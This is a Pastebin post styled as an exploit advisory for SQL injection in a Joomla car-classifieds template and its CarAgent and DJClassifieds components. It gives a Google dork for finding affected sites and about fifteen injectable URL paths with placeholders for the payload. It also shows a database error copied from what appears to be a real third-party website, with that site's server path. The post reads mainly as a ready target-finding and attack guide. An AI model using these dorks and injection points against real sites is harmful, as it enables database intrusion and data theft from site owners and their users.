KingSkrupellos

Joomla JM Car Classifieds CarAgent Templates 3.8.12 SQL Inj

Feb 24th, 2019
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.82 KB | None | 0 0
  1. ###################################################################################
  2.  
  3. # Exploit Title : Joomla JM Car Classifieds CarAgent Templates 3.8.12 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : joomla-monster.com
  8. # Software Information Link : joomla-monster.com/changelogs/joomla-3-x-templates/jm-car-classifieds
  9. joomla-monster.com/joomla-templates/i/17-classifieds-advertisement/239-jm-car-classifieds
  10. # Software Affected Versions : 1.0.5 ~ From 1.3.2 To 3.8.12 ~ All Previous Versions
  11. Compatible with Joomla 2.5 and 3.x
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_djclassifieds''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ###################################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. The hypnotizing car classifieds Joomla template for online auto classifieds website or any vehicle for sale.
  27.  
  28. With this beautiful Joomla template, you will create the professional auto classified ads website for new or used cars.
  29.  
  30. ###################################################################################
  31.  
  32. # Impact :
  33. ***********
  34. Joomla JM Car Classifieds CarAgent Templates 3.8.12 [ and other versions ]
  35.  
  36. component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently
  37.  
  38. sanitize user-supplied data before using it in an SQL query.
  39.  
  40. Exploiting this issue could allow an attacker to compromise the application, access
  41.  
  42. or modify data, or exploit latent vulnerabilities in the underlying database.
  43.  
  44. A remote attacker can send a specially crafted request
  45.  
  46. to the vulnerable application and execute arbitrary SQL commands in application`s database.
  47.  
  48. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  49.  
  50. An attacker can exploit this issue using a browser.
  51.  
  52. ###################################################################################
  53.  
  54. # SQL Injection Exploit :
  55. **********************
  56. /index.php?option=com_caragent&task=showItem&id=[SQL Injection]
  57.  
  58. /index.php?option=com_caragent&task=showItem&id=[ID-NUMBER]&Itemid=[SQL Injection]
  59.  
  60. /index.php?option=com_djclassifieds&view=showitem&cid=[SQL Injection]
  61.  
  62. /index.php?option=com_djclassifieds&view=showitem&cid=[ID-NUMBER]&id=[SQL Injection]
  63.  
  64. /index.php?option=com_djclassifieds&view=show&uid=[SQL Injection]
  65.  
  66. /index.php?option=com_djclassifieds&view=items&se=[SQL Injection]&se_regs
  67.  
  68. /index.php?option=com_djclassifieds&view=show&cid=[SQL Injection]&order=category
  69.  
  70. /index.php?option=com_djclassifieds&view=items&cid=[ID-NUMBER]&Itemid=[SQL Injection]
  71.  
  72. /index.php?option=com_djclassifieds&view=show&layout=[SQL Injection]
  73.  
  74. /index.php?option=com_djclassifieds&view=items&Itemid=[SQL Injection]
  75.  
  76. /index.php?option=com_djclassifieds&view=items&cid=[ID-NUMBER]:fashion&Itemid=[SQL Injection]
  77.  
  78. /index.php?option=com_djclassifieds&view=show&layout=blog&cid=[ID-NUMBER]&Itemid=[SQL Injection]
  79.  
  80. /index.php?option=com_djclassifieds&view=showitem&cid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]
  81.  
  82. /index.php?option=com_djclassifieds&view=items&rid=[ID-NUMBER]:[TOPIC-NAME]&Itemid=[SQL Injection]&lang=fr
  83.  
  84. /index.php?option=com_djclassifieds&view=items&cid=[ID-NUMBER]&order=price&ord_t=desc&lang=es&format=feed&type=[SQL Injection]
  85.  
  86. ###################################################################################
  87.  
  88. # Example SQL Database Error :
  89. ****************************
  90. Strict Standards: Only variables should be assigned by reference in
  91. /home/bramab/domains/bramabeskidu.pl/public_html/agroturystyka
  92. /components/com_djclassifieds/views/item/view.html.php on line 37
  93.  
  94. DB function failed with error number 1064
  95. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
  96. for the right syntax to use near 'AND (type = '.jpg' OR type = '.gif' OR type = '.png') AND ordering =
  97. 1 AND pub' at line 4 SQL=SELECT * FROM jos10_caragent_images WHERE car_id = AND
  98. (type = '.jpg' OR type = '.gif' OR type = '.png') AND ordering = 1 AND publish = 1
  99. SQL =
  100. SELECT *
  101. FROM jos10_caragent_images
  102. WHERE car_id =
  103. AND (type = '.jpg' OR type = '.gif' OR type = '.png')
  104. AND ordering = 1
  105. AND publish = 1
  106.  
  107. ###################################################################################
  108.  
  109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  110.  
  111. ###################################################################################
Add Comment
Please, Sign In to add comment